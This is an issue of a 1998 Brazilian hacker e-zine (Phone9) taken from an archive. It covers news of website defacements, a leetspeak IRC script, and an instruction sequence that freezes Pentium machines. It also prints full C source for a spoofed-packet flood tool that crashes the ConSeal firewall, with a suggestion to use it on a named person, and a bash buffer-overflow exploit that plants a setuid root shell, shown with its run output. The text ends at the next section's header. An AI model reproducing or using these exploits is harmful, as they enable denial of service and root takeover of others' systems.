ZINES — underground e-zine archive source
text size: CRT glow:
~/BRAZILIAN/Phone9/phone9-02
		  P h o n e 9 (c) 1 9 9 8  p r o d u c t i o n s
			  reg - (r) none rights reservaded.

                   __
         __/\______\ \_  ________   ________    _______ ___/\_
         \__      //   \/        \__\___   /____\__   _/  _   \
         //   --  /  [-]\   __/   \    /_     /  /_____\___.  /
       _/     ___/___/   \_     __/\____/    /______   /__/ //
       \/----/      /_____\\___/      //____/     /____\____/
  	        [c]		P h o n e 9 (c) p r o d u c t i o n s.

								  the phone9 communications,
								     - http://www.phone9.org
....												....
Phear Yer Phone, 01 de novembro de 1998.			 Phone9 Communications
edicao no.02| phone9@phone9.org					   systems, Inc.
[P9] ------------------------------------------------------------------ [P9]
[m o l e c u l e s]	     [face your phear]		   [s e l u c e l o m]
				      [gigant robots]
			        [intergalatik kriminal]

 Bem vindo a mais uma edicao da Phone9, 			        .[ektoplazma.]
							 editors: kleptomaniak - bloodroot
---											 	 ---
     P h o n e 9   c o m m u n i c a t i o n s   s y s t e m s , i n c

     _____  ____
    /   _ \/ _  \          editor-in-chief: bloodroot|kleptomaniak       [P]
    \  ___/\__  /                co-editor: ]Puruc4[ 	                   [H]
     \ \.[P9]/ /                    layout: ]Puruc4[                     [O]
	\/     \/          relacoes publicas: Dr. Eneas [PR0NA]            [N]
    [the phone9]           		 31337: bahamas, paranoia, Cacaio    [E]
     [systems.]              askii efektiz: bloodroot - alph1x t3k       [9]
	                                                          Phone9, Inc.

+-- -- --- -- ---- --- --+ the evil empire
			  .user| face your phear, Now!!!
				 : '98 productions. [c]
[Ph0ne9.]			 +--- ---  ---  - -----  ---  ---  -+ Punkass Stuffs

  The Phone9 Communications Systems,

    1] .ph0ne9.sp0ts
    2] 31337.ini, o IRC zkr1pt dos dUhd1nh4s - by bloodroot & paranoia
    3] Conseal Firewall Killer - by k2
    4] /bin/bash buffer overflow, cartas de amor para bash
    5] Microsoft Internet Exploder BUG!!!

Terceiro Passo: Paste the table below in you document.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

        Kevin
            Mitnick Contador: Este e' o tempo em que Kevin Mitnick, nao tem
            um julgamento cedido pelo governo americano.

--

   Recentemente varias listas de discussoes tem falado bastante sobre uma
   possivel conferencia hacker no Brasil,  semelhante a  DefCon e  muitas
   outras por ai.. O pessoal da Bos e outros lugares estao tentando fazer
   um encontro deste tipo, datas, nomes, promovedores entre outros  deta-
   lhes, ainda estao sendo organizados e nao tem data de estreia e nem de
   esperanca, por enquanto nos so ficamos  na vontade de ter  um encontro
   do tipo, por isso nos pedimos a colaboracao de  quem puder  contribuir
   com algo para o evento, servidores, empresas de seguranca, consorcios,
   bureaus de informatica e ate anonimos podem contribuir com esta campa-
   nha, apenas manda um email para: blood@puruca.com.br, que nos entrare-
   mos em contato com voces.

   Quanto a invasao da Mandioca, pelos camaradas da Nearz,  eu achei  uma
   boa atidude deles em mudar a pagina, ja que todos tinham acesso na man
   dic, mas ninguem tinha coragem de mudar o htm ou entao porque nao que-
   riam que o acesso ao servidor seria acabado, acabou que a nova dona da
   Mandioca, foi comprada pelo preco de uns bons megabytes de  wordlists,
   espero que os administradores da mandic nao fiquem muito chateados com
   a frustacao que eles causaram no seu sistema. :)
   Voce pode contatar a nearz pelo endereco:

	http://members.tripod.com/nearz
	http://www.cyberspace.com/~nearz
	http://www.phone9.org/nearz --> Soon...
	http://www.microsoftz.com/nearz

   O bug do ano 2000, continua acabando com as maquininhas por ai :) Ele
   agora tambem afeta computadores que trabalham em pequenos escritorios
   como os das locadores de videos, que so tem 2 digitos no lugar do ano
   ao invez de 4.  Vejamos como 4 numeros afetam a vida de muita  gente,
   tem programador cobrando 30 dolares por linha de codigo mudada. Deve-
   rao sair muitos M$ deste negocio... anti-2000 Concept???

   E para os moloides de carteria executem o seguinte e travem a sua ma-
   quinas que rodam pentium!!! hehehehehe...

Para testar a vulnerabilidade do pentium no seu computador, faca o seguinte:
no prompt do DOS: (obs. e' melhor que voce faca isto pelo DOS mesmo... :))

debug
n debug.com
a
db f0
db 0s
db c7
db c8
rcx
4
w

   Quando voce acabar de digitar este ultimo comando, entao voce sabe
   que o seu computador travou, e voce tera que reboota-lo dali :)
              [.m0td.] --- [ The  End ] -- [.m0td.]

				 1998. (c) phone9.org

.[news].		       - breaking tha news -                      .[news].

   [19/09] - Telerj finalmente reduz a tarifa em alguns servicos que ela
		 oferece, como:  O valor da  instalacao de novas linhas e  o
	 	 plano de expansao, teve uma reducao no seu preco tambem.
		 As reducoes na instalacao de linhas caiu de $147,99  para o
		 ainda alto $82,25. O preco dos telefones comprados no plano
		 de expansao teve uma reducao de 45,65%, o que torna o preco
		 de $142,68 reais para $77,54 e os novos lerdos das telerdas
		 tambem  terminaram com a cobranca de levar a linha, da cai-
		 xa de verificacao (armario), ate a caixa do predio e  assim
		 por diante ate a casa do usuarios.  Eu acho que  finalmente
		 vou poder colocar aquela LP na minha casa :) ?!?!

   [02/09] - Site  filial  ao da nasa.gov,  foi invadido  por raquers, o
		 grupo HFG 'Hacking for Girlies' tem ultimamente feito a cam
		 panha de purificacao dos sites. :)Invadindo sites que  eles
		 possam ter em mente. Na  lista dos  atacados estao os:
             nytimes.com|jpl.nasa.gov, entre outros.

   [06/09] - A MANDIoCa, foi invadido pelo NearDz, mudando a pagina ofi-
		 cial da mandic ( index.html), se  voce quiser ver a  pagina
		 hackeada da nova dona da mandic, va em:
		 - deathknights.com/phone9/mandioca.html

   [14/09] - Slashdot, o centro de informacoes para linux nerds, foi in-
		 vadido recentemente por um dUhD1nhas chamado de H4G1S, este
		 ninja,  foi o mesmo que invadiu o  nasa.gov em 97. O que e'
		 mais interessante na sua invasao é que durante a invasao da
		 nasa, ele clamou por justica nos casos do BernieS e Mitnick
		 desta vez ele manda um simples e puro  "fuck kevin mitnick"
		 e uma penca de outros caras.

   [13/09] - New York Times Hackeado, pelo grupo HFG, em protesto contra
		 a grande investida na midia, implicando que mitnick seja um
		 ladrao moderno, o ataque foi dedicado a John Markoff, o es-
		 critor do livro sobre mitnick takedown e' o jornalista mais
		 estupido, que fez toda a difamacao contra mitnick durante a
		 sua procura.

   [16/09] - X-ploit, grupo hacker mexicano, invadiu mais um site gover-
		 namental do mexico, realmente nao tenho muito informacao so
		 bre o motivo da invasao, mas voces sabem, derrepente sera a
		 resulreicao do exercito zapatista na internet???
             Frase muito comum do grupo x-ploit: "O mexico e' para os me
             xicanos, a internet e' para o Xploit."

   [19/09] - Chico.com.br, foi hackeado por um dos membros da Phone9, Puruca
		 o site foi invadido em protesto ao lamer, que se dizia o racker
		 do momento, sendo ele e a mae dele, um bando de lamers de merda
		 Voce pode ver a pagina hackeada em www.puruca.com.br/chico.html

   [21/09] - Testemunho do clinto e' mostrado na TV em mais de 400 canais si
		 multaneamente no mundo todo... Espero que ele nao tenha respon-
		 dido a questao sobre o tamanho do bigulhim dele. ;)

   [01/10] - Lancado o askii pack da Phone9, feito por alph1x t3k e b_root,
             Este pode ser achado em: puruca.com.br/phone9/askiiat.txt

   [30/10] - Crai.com.br, hackeada por Fak, que deixou uma mensagem para nos
             e para o pessoal da microsoftz.cjb.net!!!

            bloodroot
     bloodroot@webcrunchers.com
   [Gettin' seek of being weirdo]
     [being a 'especial' dude]
 ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
 ³2 - 31337.ini, o script elitaum para IRC			             ³°°
 ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿  by paranoia & b_root ³°°
								 ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ°°

	O pessoal da Udigrudi, criou um script elitaum para IRC, que
      faz com que suas letras fiquem mais 31337 que nunca.   Assim
      voce pode assustar os ratoes que existem pela net. :)
	O 31337.ini, faz parte da campanha de produtos desenvolvidos
      pela Campanha, Salvem as formigas do Sul  do Paquistao,  que
	esta associado com a microsoft.com e e' claro com o  sistema
	(011)1406 e o 'Ligue Jah.', entao em mais uma producao 31337
	nos apresentamos 31337.ini, o script elitaum...

	     thanx to: paranoia - alquem K. naoseioque Gay

 Bom, por enquanto nesta edicao nos oferecemos duas funcoes para o zkr1pt,
 a primeira e': Transformar a sua escrita para 31337, e a segunda e encrip
 tar as conversas no IRC.

	-- 31337.ini -- para todos os dUhD1nHas ai fora, b1tch3z f0r j00z!!
n0=ele {
n1= say :::::> zkr1pt elitaum 2000, 31337.ini <:::::
n2= say ::::::> 0 2kr1p7 313374um d0 br4211 <:::::::
n3= say :::::::::[ http://www.phone9.org ]::::::::::
n4= say ::::::::::|by paranoia|bloodroot|:::::::::::
n5= say ----- 5173 elitaum -> udigrudi.org <- ------
n6= set %var.textl *1
n7= set %var.textl $replace(%var.textl,e,3)
n8= set %var.textl $replace(%var.textl,i,1)
n9= set %var.textl $replace(%var.textl,a,4)
n10= set %var.textl $replace(%var.textl,s,5)
n11= set %var.textl $replace(%var.textl,t,7)
n12= set %var.textl $replace(%var.textl,o,0)
n13= set %var.textl $replace(%var.textl,l,1)
n14= set $var.textl $replace(%var.textl,g,9)
n15= set $var.textl $replace(%var.textl,z,2)
n16= set $var.textl $replace(%var.textl,k,/{)
n17= set $var.textl $replace(%var.textl,y,j)
n18= set $var.textl $replace(%var.textl,elite,31337)
n19= set $var.textl $replace(%var.textl,eleet,31337)
n20= set $var.textl $replace(%var.textl,eleeti,313371)
n21= say %var.textl
n22=}
n23=Decrypto{
n24=set %encrypto *1
n25=%encrypto = $replace(%encrypto,^,.)
n26=%encrypto = $replace(%encrypto,*,?)
n27=%encrypto = $replace(%encrypto,»,!)
n28=%encrypto = $replace(%encrypto,ë,a)
n29=%encrypto = $replace(%encrypto,¥,b)
n30=%encrypto = $replace(%encrypto,£,c)
n31=%encrypto = $replace(%encrypto,",d)
n32=%encrypto = $replace(%encrypto,ç,e)
n33=%encrypto = $replace(%encrypto,ô,f)
n34=%encrypto = $replace(%encrypto,³,g)
n35=%encrypto = $replace(%encrypto,í,h)
n36=%encrypto = $replace(%encrypto,|,i)
n37=%encrypto = $replace(%encrypto,¬,j)
n38=%encrypto = $replace(%encrypto,%,k)
n39=%encrypto = $replace(%encrypto,½,l)
n40=%encrypto = $replace(%encrypto,m,®)
n41=%encrypto = $replace(%encrypto,å,n)
n42=%encrypto = $replace(%encrypto,¡,o)
n43=%encrypto = $replace(%encrypto,¤,p)
n44=%encrypto = $replace(%encrypto,«,q)
n45=%encrypto = $replace(%encrypto,²,r)
n46=%encrypto = $replace(%encrypto,µ,s)
n47=%encrypto = $replace(%encrypto,¶,t)
n48=%encrypto = $replace(%encrypto,©,u)
n49=%encrypto = $replace(%encrypto,¢,v)
n50=%encrypto = $replace(%encrypto,·,w)
n51=%encrypto = $replace(%encrypto,`,x)
n52=%encrypto = $replace(%encrypto,ß,y)
n53=%encrypto = $replace(%encrypto,ä,z)
n54=/echo 4 %encrypt
n55=}
n56=Encrypto {
n57=set %encrypto *1
n58=%encrypto = $replace(%encrypt,.,º)
n59=%encrypto = $replace(%encrypt,?,±)
n60=%encrypto = $replace(%encrypt,!,»)
n61=%encrypto = $replace(%encrypt,a,ë)
n62=%encrypto = $replace(%encrypt,b,¥)
n63=%encrypto = $replace(%encrypt,c,£)
n64=%encrypto = $replace(%encrypt,d,“)
n65=%encrypto = $replace(%encrypt,e,ç)
n66=%encrypto = $replace(%encrypt,f,ô)
n67=%encrypto = $replace(%encrypt,g,³)
n68=%encrypto = $replace(%encrypt,h,í)
n69=%encrypto = $replace(%encrypt,i,|)
n70=%encrypto = $replace(%encrypt,j,¬)
n71=%encrypto = $replace(%encrypt,k,%)
n72=%encrypto = $replace(%encrypt,l,½)
n73=%encrypto = $replace(%encrypt,m,®)
n74=%encrypto = $replace(%encrypt,n,å)
n75=%encrypto = $replace(%encrypt,o,¡)
n76=%encrypto = $replace(%encrypt,p,¤)
n77=%encrypto = $replace(%encrypt,q,«)
n78=%encrypto = $replace(%encrypt,r,²)
n79=%encrypto = $replace(%encrypt,s,µ)
n80=%encrypto = $replace(%encrypt,t,¶)
n81=%encrypto = $replace(%encrypt,u,©)
n82=%encrypto = $replace(%encrypt,v,¢)
n83=%encrypto = $replace(%encrypt,w,·)
n84=%encrypto = $replace(%encrypt,x,`)
n85=%encrypto = $replace(%encrypt,y,ß)
n86=%encrypto = $replace(%encrypt,z,ä)
n87=say  %encrypto $+ (zkr1pt 31337 2000.)
n88=}

  -- 31337.ini -- para todos os dUhD1nHas ai fora, b1tch3z f0r j00z!!

31337.ini, toda a edicao da Phone9, um novo update do 31337.ini by paranoia,
e alguem K. Gay, e com novos updates do bloodroot.

dUhD1Nh45, os idiotas por tras de todo o plano mal feito =)

7h3 31337 & 7h4 dUhD1Nh45!!!
by paranoia - bloodroot.
[blood@phone9.org]|[paranoia@phone9.org]
 ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
 ³3 - Conseal Firewall Killer			             			 ³°°
 ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ by k2.  ³°°
                                                              ÀÄÄÄÄÄÄÄÄÄÄÙ°°

		ConSeal firewall killer
		by k2.

  O firewall Conseal da signal9 (signal9.com),  tem uma vulnerabilidade
  nas sua estruturas, permitindo que voce possa fechar  o firewall  por
  meio de um ataque DoS, e' bem util na hora de  mandar pacotes  obscu-
  ros para  usuarios de  win95/98,  a empresa  ainda nao lancou  nenhum
  mas e' seguramente recomendavel que voces usem outro firewall pessoal
  (nao recomendo nenhum,  ipfwadm???). O bug se  divide em duas partes,
  na primeira ele explora a opcao 'learning' do firewall, da qual novas
  novas regras de tratamento  de pacotes do firewall sao adaptados,  um
  grande flood no IP que roda o firewall, assim a cada pacote especial,
  novas regras serao adaptadas, ate' que o numero de regras fique cheio
  ai o firewall fecha e o sistema reboota. A segunda parte do bug, se a
  opcao  de logar todos  os ataques, entao voce pode mandar um flood de
  ataques que  este ira  logar todos,  se a  quantidade for  extensiva
  de pacotes for o suficiente para lotar o HD da vitima, caso isto acon
  teca, entao o programa fecha e provavelmente o sistema ira rebootar;)

	Veja o codigo abaixo. by Noc-Wage.

--[ consealdos.c ]--
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#ifdef BROKEN_LIBC
#include
#else
#define u_char unsigned char
#define u_short unsigned short
#endif

struct sockaddr sa;

int main(int argc,char **argv)
{
int fd;
int x=1;
int hosti=192;
int hostii=168;
int hostiii=1;
int meep=0;
int fooport=1;
int numpack=0;
char funhost[15];
struct sockaddr_in *p;
struct hostent *he;
u_char gram[36]=
 {
 0x45, 0x00, 0x00, 0x26,
 0x12, 0x34, 0x00, 0x00,
 0xFF, 0x11, 0, 0,
 0, 0, 0, 0,
 0, 0, 0, 0,

 0, 0, 0, 0,
 0x00, 0x12, 0x00, 0x00,

 '3','1','3','3','7','8','9','0'
 };

if(argc!=3)
 {
 fprintf(stderr,"Saihyousen, by Noc-Wage\n");
 fprintf(stderr,"The faster your connection to the internet is (latency
wise, not bandwidth)\n");
 fprintf(stderr,"and the lower the CPU speed of the victim
will\nincrease probability of success\n");
 fprintf(stderr,"usage: %s victim num_of_packets Ex: saihyousen
127.0.0.1 40000\n",*argv);
 exit(1);
 };
if((fd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))== -1)
 {
 perror("requires RAW SOCKETS");
 exit(1);
 };

#ifdef IP_HDRINCL
if (setsockopt(fd,IPPROTO_IP,IP_HDRINCL,(char*)&x,sizeof(x))<0)
 {
 perror("setsockopt IP_HDRINCL");
 exit(1);
        };
#else
fprintf(stderr,"we don't have IP_HDRINCL :-(\n\n");
#endif

/* The stuff below is so that it's not fully sequential  i.e
   100.100.100.101, 100.100.100.102  */
for (numpack=0;numpack<=atoi(argv[2]);numpack++) {
 if (meep==0) { ++hosti; meep++; }
 if (hosti>254) hosti=1;
 if (meep==1) { ++hostii; meep++;}
 if (hostii>254) hostii=1;
 if (meep==2) { ++hostiii; meep=0;}
 if (hostiii>254) hostiii=1;

sprintf( funhost, "%i.%i.%i.%i",hosti,hostii,hostiii,hosti);
(he=gethostbyname(funhost));
bcopy(*(he->h_addr_list),(gram+12),4);

if((he=gethostbyname(argv[1]))==NULL)
 {
 fprintf(stderr,"can't resolve destination hostname\n");
 exit(1);
 };
bcopy(*(he->h_addr_list),(gram+16),4);
fooport++;
/* resets the port to 1 if it's nearing the end of possible values */
if (fooport>65530) {fooport=1;};
*(u_short*)(gram+20)=htons((u_short)fooport);
*(u_short*)(gram+22)=htons((u_short)fooport);

p=(struct sockaddr_in*)&sa;
p->sin_family=AF_INET;
bcopy(*(he->h_addr_list),&(p->sin_addr),sizeof(struct in_addr));

if((sendto(fd,&gram,sizeof(gram),0,(struct sockaddr*)p,sizeof(struct
sockaddr)))== -1)
 {
 perror("sendto");
 exit(1);
 };
/* printf("Packet # %i\n", numpack); */
/* Turn that on to see where you are.. it'll slow the attack though */
};
printf("Attack against %s finished", argv[1]);
putchar('\n');
return 1;
}
--[ consealdos.c ]--

  Para se proteger contra este tipo de ataque e' bem simples, apenas
  deshabilite as opcoes de 'log attack' e 'new rules', assim o fire-
  wall fica seguro contra estes tipos de ataques... ;)

obs: phineas usa conseal, DoS nele!!!! heheheh
k2@phone9.org - k2@microsoftz.com
 ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
 ³4 - /bin/bash buffer overflow, cartas de amor para bash			 ³°°
 ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ by bloodroot.  ³°°
                                                       ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ°°

	Bom, recentemente alguem com um nome muito estranho (hihihi!),
	descobriu um buffer overflow dentro  do /bin/bash, que  ocorre
	quando a opcao '\w' quando dentro do PS1.

	Eis o codigo do exploitito:
--[ code -tp.c- ]--
#include

char code[] =
        "\xeb\x24"              /* jmp    GETADDR         */
                                /* RUNPROG:               */
        "\x5e"                  /* popl   %esi            */
        "\x89\x76\x08"          /* movl   %esi,0x8(%esi)  */
        "\x31\xc0"              /* xorl   %eax,%eax       */
        "\x88\x46\x07"          /* movb   %al,0x7(%esi)   */
        "\x89\x46\x0c"          /* movl   %eax,0xc(%esi)  */
        "\xfe\x06"              /* incb   (%esi)          */
        "\xfe\x46\x04"          /* incb   0x4(%esi)       */
        "\xb0\x0b"              /* movb   $0xb,%al        */
        "\x89\xf3"              /* movl   %esi,%ebx       */
        "\x8d\x4e\x08"          /* leal   0x8(%esi),%ecx  */
        "\x8d\x56\x0c"          /* leal   0xc(%esi),%edx  */
        "\xcd\x80"              /* int    $0x80           */
        "\x31\xdb"              /* xorl   %ebx,%ebx       */
        "\x89\xd8"              /* movl   %ebx,%eax       */
        "\x40"                  /* incl   %eax            */
        "\xcd\x80"              /* int    $0x80           */
                                /* GETADDR:               */
        "\xe8\xd7\xff\xff\xff"  /* call   RUNPROG         */
        ".tmp.tp";              /* Program to run .XXX.XX */

int ADDR=0xbffff2ff;

void main(void) {
        char dir[256];
        int i, align;

        printf("BASH '\w' opcao PS1 buffer overflow.\n");

        printf("- Criando /tmp/tp.c\n");
        system("echo 'main() {'                        >  /tmp/tp.c");
        system("echo 'system(\"cp /bin/sh /tmp/sh\");' >> /tmp/tp.c");
        system("echo 'system(\"chmod +s /tmp/sh\");'   >> /tmp/tp.c");
        system("echo '}'                               >> /tmp/tp.c");

        printf("- Compilando /tmp/tp.c to /tmp/tp\n");
        system("gcc -o /tmp/tp /tmp/tp.c");

        printf("- Removendo /tmp/tp.c\n");
        system("rm -f /tmp/tp.c");

        /* Computing alignment for the 'address' directory */
        getcwd(dir,255);
        align=(strlen(dir)+2) % 4;

        memset(dir,'A',255);
        dir[255]=0;

        printf("- Criando dir. AAA.../AAA.../AAA.../CODE.../ADDR...\n");
        mkdir(dir,0777);
        chdir(dir);
        mkdir(dir,0777);
        chdir(dir);
        mkdir(dir,0777);
        chdir(dir);

        /* create directory which name is our code */
        mkdir(code,0777);
        chdir(code);

        /* create directory which name is return addresses */
        for(i=align;i<252;i+=4) *(int *)&dir[i]=ADDR;
        mkdir(dir,0777);
        chdir("../../../../");

        printf("- OK.\n\n");
}
--[ code -tp.c- ]--

			rode isto como usuario normal do sistema:

	  [raquerzao]:~$ id
        uid=1000(reqUer) gid=1000(raqUer) groups=1000(test)
        [raquerzao]:~$ ./bashps1
        BASH '\w' opcao PS1 buffer overflow.
        - Criando /tmp/tp.c
        - Compilando /tmp/tp.c to /tmp/tp
        - Removendo /tmp/tp.c
        - Criando diretorios AAA.../AAA.../AAA.../CODE.../ADDR...
        - Ok.

Agora provavelmente voce devera ter o tp.c no seu diretorio /tmp.
        [raquerzao]:~$ ls -l /tmp/tp
        -rwxr-xr-x   1 test     test         3981 Sep  4 20:54 tp

Entao como r00t rode:
bash# export PS1='bash:\w\$ '
debian:~# cd ~/reqUer
debian:/home/reqUer# cd AAAAAAAA*/*/*/*/*
shell-init:couldnotgetcurrentdirectory:getwd:cannotaccessparentdirectories
shell-init:couldnotgetcurrentdirectory:getwd:cannotaccessparentdirectories

Entao a bash morre (sniff ;)) ai, é facil,
        [raquerzao]:~$ ls -l /tmp/sh
        -rwsr-sr-x   1 root     root       304676 Sep  4 20:55 sh

	Mas espere, nao é so issu!!! Se voce ligar (011)1406, voce podera
	adiquirir esta linda carta de amor para o tcsh, outra exclusivida
	de das empresas elitaum de deus ;)

		Bom, a mesma coisa funciona com o /bin/tcsh...
		Trusted Cshell??? I dont think soo :)

	Bom, de qualquer modo no tcsh, e' possivel voce instalar um patch
	para que esta carta de amor para de chegar ao seu sistema,.abaixo

--- tcsh-6.07.06.orig/sh.dir.c
+++ tcsh-6.07.06/sh.dir.c
@@ -78,7 +78,7 @@
     char    path[MAXPATHLEN];

-    tcp = (char *) getwd(path);
+    tcp = (char *) getcwd(path, MAXPATHLEN);
     if (tcp == NULL || *tcp == '\0') {
        xprintf("%s: %s\n", progname, path);
        if (hp && *hp) {
@@ -549,7 +549,8 @@
     }
 #endif /* apollo */

-    (void) strcpy(ebuf, short2str(cp));
+    (void) strncpy(ebuf, short2str(cp), MAXPATHLEN);
+    ebuf[MAXPATHLEN-1]=0;
@@ -1061,7 +1062,7 @@
 #endif /* apollo */
                continue;       /* canonicalize the link */
            }
-#endif /* S_IFLNK */
+#endif /* S_IFLNKXYZ */
            if (slash)
                *p = '/';
        }
@@ -1096,7 +1097,8 @@
        /*
         * Start comparing dev & ino backwards
         */
-       p2 = Strcpy(link, cp);
+       p2 = Strncpy(link, cp, MAXPATHLEN);
+       link[MAXPATHLEN-1]=0;
        found = 0;
        while (*p2 && stat(short2str(p2), &statbuf) != -1) {
            if (DEV_DEV_COMPARE(statbuf.st_dev, home_dev) &&
@@ -1119,7 +1121,7 @@
            cp = newcp;
        }
     }
-#endif /* S_IFLNK */
+#endif /* S_IFLNKXYZ */

 #ifdef apollo
     if (slashslash) {
@@ -1255,7 +1257,9 @@
                return (0);
        }
     }
-    (void) Strcpy(s, dp->di_name);
+
+    (void) Strncpy(s, dp->di_name, MAXPATHLEN);
+    s[MAXPATHLEN-1]=0;
     return (1);
 }

---
codigo por: MiG.
texto  por: bloodar00tou.

/bin/bash buffer overflow.
by - reg (c) blood@puruca.com.br
 ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
 ³5 - Microsoft Internet Exploder BUG!!!